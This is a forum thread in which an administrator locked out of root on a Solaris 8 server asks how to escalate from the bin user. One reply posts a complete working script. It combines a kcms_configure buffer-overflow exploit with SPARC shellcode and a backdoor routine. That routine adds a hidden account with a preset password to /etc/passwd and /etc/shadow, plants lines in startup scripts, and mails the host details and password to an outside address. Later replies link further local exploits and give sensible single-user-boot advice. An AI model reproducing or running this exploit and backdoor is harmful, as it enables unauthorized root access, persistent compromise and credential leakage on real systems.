.

Solaris 8 - from bin to root

<<

dazdaz

Newbie
Newbie

Posts: 9

Joined: Mon May 21, 2007 6:11 am

Post Sat Sep 04, 2010 1:04 pm

Solaris 8 - from bin to root

Hi,

I am not sure where to post this, so I try in the "Other - Hacking discussion", apology's in advance if this is incorrect.

I have quite an interesting UNIX Admin dilemma.

I have a Solaris 8 Production server where the root user entry in the passwd file has become overwrote with some random text, voiding the root user completely.  I am trying all methods to obtain uid 0 and changing this back to the correct entry before I try a final and last resort of "boot cdrom -s", which becomes complicated when the server is in a remote unmanaged datacenter.

Through some luck, I can switch to the bin user using what appears to be a misconfigured sudo with the command, "sudo -u bin bash"

How can I then switch from bin to root.  What vulnerability's exist which would allow me to do this.

I've been looking over /etc/security/exec_attr to see what commands run priviledged.  sudo is suid root and version 1.6.8p7 if i recall correctly.

Remember that the root account no longer exists, so I can't execute cron jobs, nor su to root.

The box also has VxVM 4.x installed.
<<

sil

User avatar

Hero Member
Hero Member

Posts: 551

Joined: Thu Mar 20, 2008 8:01 am

Location: ::1

Post Sat Sep 04, 2010 1:49 pm

Re: Solaris 8 - from bin to root

Alright, so depending on your patch levels, you should be able to use something I wrote about 12 years ago called rootkeep.sh (http://packetstormsecurity.org/0006-exp ... ootkeep.sh) Read it, use at your own risk, modify the email address, and so on. Should do the trick (still does on 2.6 - 2.9)

  Code:
################################################
#
# !/bin/sh
# Rootkeep version *somefin_r33t_goes_here*
# Gain root via kcms.. Follow instructions and
# script will ensure an instant backdoor every
# reboot. Fscking Solaris start-up scripts suck
# Code for KCMS was chopped up by Shadow Pengiun
# Society
# @rwxr--r-- #unixgods (efnet)
#
################################################

cat > kcms.c << EOF

#define ENV         "NETPATH="
#define MAXBUF      3000
#define RETADR      2116
#define RETOFS      0x1300
#define EXPADR      1200
#define FAKEADR1    2092
#define FAKEADR2    2112
#define NOP         0xa61cc013

char exploit_code[] =
"\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";

unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}

main()
{
    char            buf[MAXBUF];
    unsigned int    i,ip,sp;

    putenv("LANG=");
    sp=get_sp();
    printf("ESP =0x%x\n",sp);

    for (i=0;i<MAXBUF-4;i+=4){
        buf[i+3]=NOP&0xff;
        buf[i+2]=(NOP>>8)&0xff;
        buf[i+1]=(NOP>>16)&0xff;
        buf[i  ]=(NOP>>24)&0xff;
    }

    ip=sp;
    printf("FAKE=0x%x\n",sp);
    buf[FAKEADR1+3]=ip&0xff;
    buf[FAKEADR1+2]=(ip>>8)&0xff;
    buf[FAKEADR1+1]=(ip>>16)&0xff;
    buf[FAKEADR1  ]=(ip>>24)&0xff;
    buf[FAKEADR2+3]=ip&0xff;
    buf[FAKEADR2+2]=(ip>>8)&0xff;
    buf[FAKEADR2+1]=(ip>>16)&0xff;
    buf[FAKEADR2  ]=(ip>>24)&0xff;

    ip=sp-RETOFS;
    printf("EIP =0x%x\n",sp);
    buf[RETADR+3]=ip&0xff;
    buf[RETADR+2]=(ip>>8)&0xff;
    buf[RETADR+1]=(ip>>16)&0xff;
    buf[RETADR]=(ip>>24)&0xff;

    strncpy(buf+EXPADR,exploit_code,strlen(exploit_code));

    strncpy(buf,ENV,strlen(ENV));
    buf[MAXBUF-1]=0;
    putenv(buf);

    execl("/usr/openwin/bin/kcms_configure","kcms_configure","1",0);
}

EOF

echo "Please wait"
gcc kcms.c -o /usr/dt/examples/dtdnd
chmod +x /usr/dt/examples/dtdnd

# This retains your root shell by piecing
# echo'd predefined user and password into
# separate Solaris start up scripts which
# we all know are a nightmare...

cat > dtwsm << EOF

#!/bin/sh
# rootkeep v.1
# sil@antioffline.com

USER="dtserver:x:2012:2012::/usr/dt:/bin/sh"
MAIL="intrusion@engineer.com"
PATH=/usr/dt/examples
FILE1=/etc/rc2.d/K40syslog
FILE2=/usr/platform/sun4u/lib/flash-update.sh
HOST=ifconfig -a
PASS=/etc/passwd
SHAD=/etc/shadow
STRN="dtserver:uFBzOiICo3deU:11107:7:91:28:::"
# string equates to p4$sW3rD
WORD="p4$sW3rD"
if test -n grep dtserver $PASS

   then echo $HOST is already backdoored >> /usr/dt/examples/dtinfo;
   mail -s dtserver $MAIL < /usr/dt/examples/dtinfo;
else

   echo $USER >> $PASS;
   echo $STRN >> $SHAD;
   mail -s dtserver MAIL < /usr/dt/examples/dtinfo

fi

if test -n grep $STRN $SHAD

then echo Password is set to $WORD | mail -s dtserver $MAIL

else
   echo "echo dtserver:x:2012:2012::/usr/dt:/bin/sh" >> $FILE1;
   echo "echo dtserver:uFBzOiICo3deU:11107:7:91:28:::" >> $FILE2;
   mail -s dtsrm -f /usr/dt/example/dtd

fi
EOF

chmod +x dtdnd
mv dtdnd /usr/dt
/usr/dt/examples/./dtdnd

echo "Now type /usr/dt/examples/./dtwsm and your set...."

<<

dazdaz

Newbie
Newbie

Posts: 9

Joined: Mon May 21, 2007 6:11 am

Post Sat Sep 04, 2010 2:46 pm

Re: Solaris 8 - from bin to root

Hi, thanks for the reply, I really appreciate it however there is something that does'nt quite make sense to me.  The comments at the top of the script suggest that after you've rebooted the system, then you'll obtain root access.

If I reboot the system then I may as well send a technician to the datacenter to insert a Solaris CD and boot off the cdrom into single user mode using the serial console and mount the root file-system and edit/correct the root entry in the passwd file manually, as both methods will cause system downtime.

As this is a production server there is no compiler installed although I am sure that I can find one somewhere.

The patch levels are not the most current, nor does it make use of the Solaris 8 vintage patching service.

Quote "
# Follow instructions and script will ensure an instant backdoor every reboot.
# Fscking Solaris start-up scripts suck"
Last edited by dazdaz on Sat Sep 04, 2010 2:50 pm, edited 1 time in total.
<<

sil

User avatar

Hero Member
Hero Member

Posts: 551

Joined: Thu Mar 20, 2008 8:01 am

Location: ::1

Post Sat Sep 04, 2010 3:46 pm

Re: Solaris 8 - from bin to root

Please read through the script and what it sets out to accomplish and what it ends up doing. Step by step:

1) Compile an exploit aimed at KCMS
2) Exploit KCMS
3) Acquite a rootshell
ADDONS
4) Add a root level user account using a predefined password
5) Add modifications to start up script to ENSURE a root shell upon a reboot

If you go through steps 1, 2 and 3, you'd get root, what you choose to do from there is up to you.
<<

dazdaz

Newbie
Newbie

Posts: 9

Joined: Mon May 21, 2007 6:11 am

Post Sat Sep 04, 2010 4:03 pm

Re: Solaris 8 - from bin to root

Sorry, i should of spent longer reading through the script.

There is'nt a directory named /usr/openwin/bin (no openwindows, removed for increased security) and thus no kcms to exploit on the box.
<<

sil

User avatar

Hero Member
Hero Member

Posts: 551

Joined: Thu Mar 20, 2008 8:01 am

Location: ::1

Post Sat Sep 04, 2010 5:08 pm

Re: Solaris 8 - from bin to root

The harsh reality is, you're safer having someone go through the motions of a single mode boot to fix the password however, even with a single boot, I don't believe they'd be able to get far under certain conditions... Is PROM protected? If so, I *do* hope that password is remembered.

Now, you stated that the password entry for root is borked, and while this is fixable, a lost PROM password is a whole "nother" ballgame. So do you know if "security-mode" is set to full on PROM if so, then you'll have to make sure whomever is booting into single mode knows this and knows the password for getting past the PROM.

Again, to be on the safe side, you'd be safer to get someone to go through the motions (boot -s) however, make sure you have all the information down to a science (supplied them with all the credentials, etc.) otherwise the longer that server is down, the more money you potentially lose. If you do want to keep on trying local exploits, you can try the linked local exploits for Solaris. Again, use those and ANY exploit at your own risk.

http://www.exploit-db.com/exploits/1182/
http://www.exploit-db.com/exploits/715/

I had a similar scenario last week with a FreeBSD 8.1 box I deployed to do flow-analysis. I created the machine for a client to run tshark, etc and SCP over the files to me on an hourly basis for analysis. The client supplied the server, I installed and scripted some tools and I created the password based on what the client wanted... Guess what? He lost the password and there was NO ONE around to boot into single mode for me. The machine itself was in another state and NOT a NOC where I would have had someone to do anything for me. Lo-and-behold one of kingcope's local exploits came in handy for me. From $USER to root in less than 10 minutes (about 8 were spent shmoozing via email and searching).

Anyway, my rambling is besides the point I guess... You're better off having someone ON-SITE do any changes to be on the safer side. I'd suggest having them perform these changes as late (non-used hours) as possible and enforce this. I've seen NOC's and their engineers say "sure... at 3AM alright", then turn around 15 minutes later. Your SLA is king ;)  Also, if possible you'd want to know WHO would be making the changes (booting into single) beforehand so you can walk through the motions with them either via email or on the phone. This ensures (as best as possible) that someone with a clue is going to make the change.
<<

dazdaz

Newbie
Newbie

Posts: 9

Joined: Mon May 21, 2007 6:11 am

Post Sun Sep 05, 2010 2:48 am

Re: Solaris 8 - from bin to root

Great, the ldpreload exploit should work from checking the patch revisions on the box.

Believe it or not, there is no PROM security.

We believe it was one of 2 developers who overwrote the passwd file although why they were editing it in the first place we dont know.

This type of scenario would make a great UNIX admin interview question, although I hope that I never see this type of problem ever again :-)

I hav'nt used FreeBSD for ages, but a great platform !
<<

dynamik

Recruiters
Recruiters

Posts: 1134

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Sun Sep 05, 2010 8:59 am

Re: Solaris 8 - from bin to root

I'm not that familiar with Solaris, but if someone has write access to the password file, why can't they just edit that?
The day you stop learning is the day you start becoming obsolete.
<<

sil

User avatar

Hero Member
Hero Member

Posts: 551

Joined: Thu Mar 20, 2008 8:01 am

Location: ::1

Post Sun Sep 05, 2010 10:21 am

Re: Solaris 8 - from bin to root

dynamik wrote:I'm not that familiar with Solaris, but if someone has write access to the password file, why can't they just edit that?


Take note: Remember that the root account no longer exists, so I can't execute cron jobs, nor su to root. He didn't have access to an account that had enough privileges.

Solaris from an admin level is no different from Linux. The command syntax is a lot different but at the end of the day, the core is the same. If he had access to an account to write to it, he would have been able to make the change.

A long time ago I ran into a similar problem under Solaris however, root as a user was completely gone and I literally had to retype the account in vi via single mode. I've also run into this situation on zones on Solaris. Because a root user in one zone can't do what a root user in that container can, I had to root as root a container ;)

Solaris is a funny OS, end of the day though, no different from Linux. He just didn't have privileges. On the flip side, if he was using containers/zones, he'd of been hit since getting root on one container does nothing for another zone. (Who's on first? No who's on second...)
<<

dynamik

Recruiters
Recruiters

Posts: 1134

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Sun Sep 05, 2010 12:26 pm

Re: Solaris 8 - from bin to root

Ah, so they simply don't have access anymore. Thanks.
The day you stop learning is the day you start becoming obsolete.

Return to Other

Who is online

Users browsing this forum: No registered users and 0 guests

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software